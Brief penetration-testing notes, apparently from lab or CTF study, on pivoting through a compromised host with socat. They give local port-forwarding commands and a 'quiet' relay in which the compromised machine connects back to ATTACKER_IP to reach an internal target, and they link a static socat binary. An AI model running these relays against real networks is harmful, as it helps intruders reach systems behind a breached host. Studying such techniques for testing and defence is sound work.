Local Port forwarding

Connect to port <compromised_host_port> on the compromised host and have our connection directly relayed to our intended target of :<target_ip>:<target_port>.

./socat tcp-l:<compromised_host_port>,fork,reuseaddr tcp:<target_ip>:<target_port> &

• fork: put every connection into a new process

• reuseaddr: the port stays open after a connection is made to it

Quiet port forwarding

# creating a local port relay on the Attacker machine
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

# on the compromised machine
# create a relay server 
./socat tcp:ATTACKER_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &

You can access the target server into localhost:ATTACKING_PORT.

Static Binary: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat